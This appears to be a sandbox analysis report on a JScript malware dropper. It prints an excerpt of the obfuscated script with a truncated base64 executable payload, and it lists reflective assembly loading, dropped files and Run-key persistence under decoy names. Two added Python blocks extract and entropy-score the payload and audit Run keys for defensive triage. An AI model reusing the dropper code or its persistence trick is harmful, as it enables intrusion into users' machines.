Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep(0);WScript.Sleep(1000);ZrshnIkzr = '' XLSJBrjTTVfbj = 60;var umxzSxEEWdqHpaqxQRJlALrQLUdXtWpCGtfawWlRXmBhbCMRsWDEWpjivhoxThKzonAw = 'uQBtgsONJJoIIMeXTlgRJxeOinxqbBsoCPWcUJXebWYltfoHCngDGjnxlmLsuYlIRzGtpBCKNCpnYsVCzqnnVoiTcZrixfjDkQUtYuRAlWqEtzZtRJsEkxmcRmRQKUMhTmCHXbd';EZmCzyeaczyQomfS = 2;var nescldAqRJIlGwRVqfoeyvmdmMoRLDXvnTPdfyraZvkqptTgicaJyAUrrOqZpjeOlNxnhnqrnNFCLwottIiidOwmyXmQISlqQVEcvfyumiWkvSguawfgAwlXQKoJBZjU = 'bOlpsLxNJnwurMrgqrqLmFpUkgMlrotNzBJhgrCOyRWMAqfETHTKjXhWYQEMzMWVuiuqCKzzobNVidUtAHRjViecUmIPmqPmvBSRwpBJITVHJMovwKLrunzLESWQBkMyLbZgLDxKGIbBNWSHyMTbeYrICGNdTlHX';ZrshnIkzr = ZrshnIkzr + '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
Source: GeUT.exe.0.dr, Program.cs .Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: 0.3.wscript.exe.26357946390.0.raw.unpack, Program.cs .Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: 0.2.wscript.exe.263586370e0.0.raw.unpack, Program.cs .Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: Service.exe.2.dr, Program.cs .Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
Source: GeUT.exe.0.dr Static PE information: section name: .text entropy: 7.937538668947789
Source: Service.exe.2.dr Static PE information: section name: .text entropy: 7.937538668947789
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\GeUT.exe
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File created: C:\Users\user\AppData\Roaming\Service.exe
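The three findings above chain into one triage step: the JScript accumulates a base64 blob whose first characters (TVqQ) decode to the MZ magic, the decoded bytes are fed to Assembly.Load(byte[]), and the dropped PE carries a .text section at entropy 7.94. The Python below is an added example, not code from the report or from the sample: it pulls NAME = NAME + '...' chunks out of a script, decodes any accumulator that starts with MZ, walks the COFF section table and scores each section's byte entropy. The script and the PE it parses are constructed inside the block; only the accumulator name ZrshnIkzr and the append pattern are taken from the AMSI capture above.

```python
"""Pull a base64-embedded PE out of a JScript dropper and score its sections.

Added example, not code from the report or the sample: the script and the PE
below are constructed; only the accumulator variable name (ZrshnIkzr) and the
"NAME = NAME + '<base64>'" shape are taken from the AMSI capture above.
"""
import base64
import hashlib
import math
import re
import struct
from collections import Counter

# Droppers of this kind build the payload with repeated  NAME = NAME + '....';
_APPEND = re.compile(r"(\w+)\s*=\s*\1\s*\+\s*'([A-Za-z0-9+/=]+)'")


def extract_b64_payloads(script: str) -> dict:
    """Return {variable: concatenated base64} for every append-accumulator."""
    acc = {}
    for name, chunk in _APPEND.findall(script):
        acc[name] = acc.get(name, "") + chunk
    return acc


def decode_if_pe(b64: str):
    """Decode base64 (restoring stripped padding); keep it only if it starts with MZ."""
    try:
        blob = base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)
    except ValueError:
        return None
    return blob if blob[:2] == b"MZ" else None


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(pe: bytes):
    """Yield (name, raw_bytes) by walking the COFF section table."""
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, = struct.unpack_from("<H", pe, e_lfanew + 6)        # NumberOfSections
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)   # SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size
    for i in range(nsec):
        off = table + 40 * i
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)  # SizeOfRawData, PointerToRawData
        yield name, pe[raw_ptr:raw_ptr + raw_size]


def analyze(script: str) -> dict:
    """{variable: {section: entropy}} for every embedded PE found in the script."""
    report = {}
    for var, b64 in extract_b64_payloads(script).items():
        pe = decode_if_pe(b64)
        if pe is not None:
            report[var] = {n: round(shannon_entropy(raw), 3) for n, raw in pe_sections(pe)}
    return report


def build_fake_pe() -> bytes:
    """Constructed two-section PE: high-entropy .text, zero-filled .rsrc."""
    text, seed = b"", b"constructed"
    while len(text) < 4096:                      # deterministic pseudo-random bytes
        seed = hashlib.sha256(seed).digest()
        text += seed
    rsrc = bytes(1024)
    hdr_end = 0x40 + 24 + 2 * 40                 # DOS hdr + PE sig/COFF + 2 section hdrs
    dos = b"MZ\x90\x00" + bytes(0x3C - 4) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x102)

    def sec(name, raw, ptr, rva):
        return struct.pack("<8sIIIIIIHHI", name, len(raw), rva, len(raw), ptr, 0, 0, 0, 0, 0x60000020)

    return (dos + coff + sec(b".text", text, hdr_end, 0x1000)
            + sec(b".rsrc", rsrc, hdr_end + len(text), 0x3000) + text + rsrc)


def build_fake_script(pe: bytes) -> str:
    """Constructed JScript in the dropper's style: payload split into appended chunks."""
    b64 = base64.b64encode(pe).decode()
    lines = ["WScript.Sleep(1000);", "ZrshnIkzr = '';"]
    lines += [f"ZrshnIkzr = ZrshnIkzr + '{b64[i:i + 120]}';" for i in range(0, len(b64), 120)]
    return "\n".join(lines)


if __name__ == "__main__":
    for var, sections in analyze(build_fake_script(build_fake_pe())).items():
        for name, h in sections.items():
            print(f"{var}: {name:<8} entropy={h:.3f}{'  <- packed/encrypted?' if h > 7.0 else ''}")
```

A code section near 8 bits per byte means the bytes are compressed or encrypted rather than x86 or CIL, which is what the 7.94 above indicates; a threshold around 7.0 is the usual heuristic. The AMSI capture on this page is cut short, so the extractor has to be run against the complete script (the dropped file or the full AMSI buffer), not the excerpt.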

Boot Survival

Source: C:\Users\user\AppData\Roaming\Service.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows (5 occurrences)
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows (4 occurrences)
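Both loaders register under HKCU\...\Run with value names chosen to pass as OS components (Windows, WindowsUpdate). The Python below is an added example, not from the report: it audits Run values for an image staged in a user-writable folder combined with a decoy value name, the two signals a responder checks first. The entries in SAMPLE_VALUES are constructed after the two value names above and the two dropped-file paths in this report; the report only shows the key and value name, so the assumption that each value points at the corresponding dropped file is mine. With --live on Windows the block reads the real key through winreg instead.

```python
"""Audit the HKCU Run key for loaders staged in user-writable folders.

Added example, not part of the report: the entries in SAMPLE_VALUES are
constructed after the two value names this section shows ("Windows",
"WindowsUpdate") and the two dropped-file paths; the image paths are an
assumption. Pass --live on Windows to read the real key instead.
"""
import re
import sys

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Folders an unprivileged user can write to; a Run value whose image lives
# here is the pattern "Run key pointing to suspicious folder" rules key on.
SUSPICIOUS_DIRS = (
    "\\appdata\\local\\temp\\",
    "\\appdata\\roaming\\",
    "\\users\\public\\",
    "\\windows\\temp\\",
    "\\programdata\\",
)
# Value names chosen to pass as OS components (the sample uses the first two).
DECOY_NAMES = {"windows", "windowsupdate", "service", "svchost", "explorer"}

SAMPLE_VALUES = [  # constructed; first two mirror this report, last two are benign
    ("Windows", r"C:\Users\user\AppData\Roaming\Service.exe"),
    ("WindowsUpdate", r"C:\Users\user\AppData\Local\Temp\GeUT.exe"),
    ("OneDrive", r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("SecurityHealth", r"C:\Windows\System32\SecurityHealthSystray.exe"),
]

_IMAGE = re.compile(r'^\s*"?([^"]+?\.(?:exe|dll|scr|bat|cmd|js|vbs|ps1))"?', re.I)


def image_path(command: str) -> str:
    """Strip quoting and trailing arguments from a Run value's command line."""
    m = _IMAGE.match(command)
    return m.group(1) if m else command.strip()


def audit_run_values(values):
    """Return one finding dict per suspicious (value_name, command) pair."""
    findings = []
    for name, command in values:
        image = image_path(command)
        reasons = []
        folder = next((d for d in SUSPICIOUS_DIRS if d in image.lower()), None)
        if folder:
            reasons.append(f"image lives under user-writable folder '{folder}'")
        if name.lower() in DECOY_NAMES:
            reasons.append(f"value name '{name}' mimics an OS component")
        if reasons:
            findings.append({
                "key": "HKCU\\" + RUN_KEY,
                "name": name,
                "image": image,
                "severity": "high" if len(reasons) == 2 else "medium",
                "reasons": reasons,
            })
    return findings


def live_run_values():
    """Enumerate (name, data) from the real key; Windows only (stdlib winreg)."""
    import winreg
    out, i = [], 0
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:          # ERROR_NO_MORE_ITEMS ends the enumeration
                return out
            out.append((name, str(data)))
            i += 1


if __name__ == "__main__":
    live = "--live" in sys.argv and sys.platform == "win32"
    for f in audit_run_values(live_run_values() if live else SAMPLE_VALUES):
        print(f"[{f['severity']}] {f['key']}\\{f['name']} -> {f['image']}")
        for r in f["reasons"]:
            print("    -", r)
```

A folder hit on its own is a hunting signal, not a verdict: per-user installers legitimately place executables under AppData, which is why the OneDrive entry in the sample set is not flagged. Pairing the folder check with the decoy-name check is what lifts the two entries from this report to high.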
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
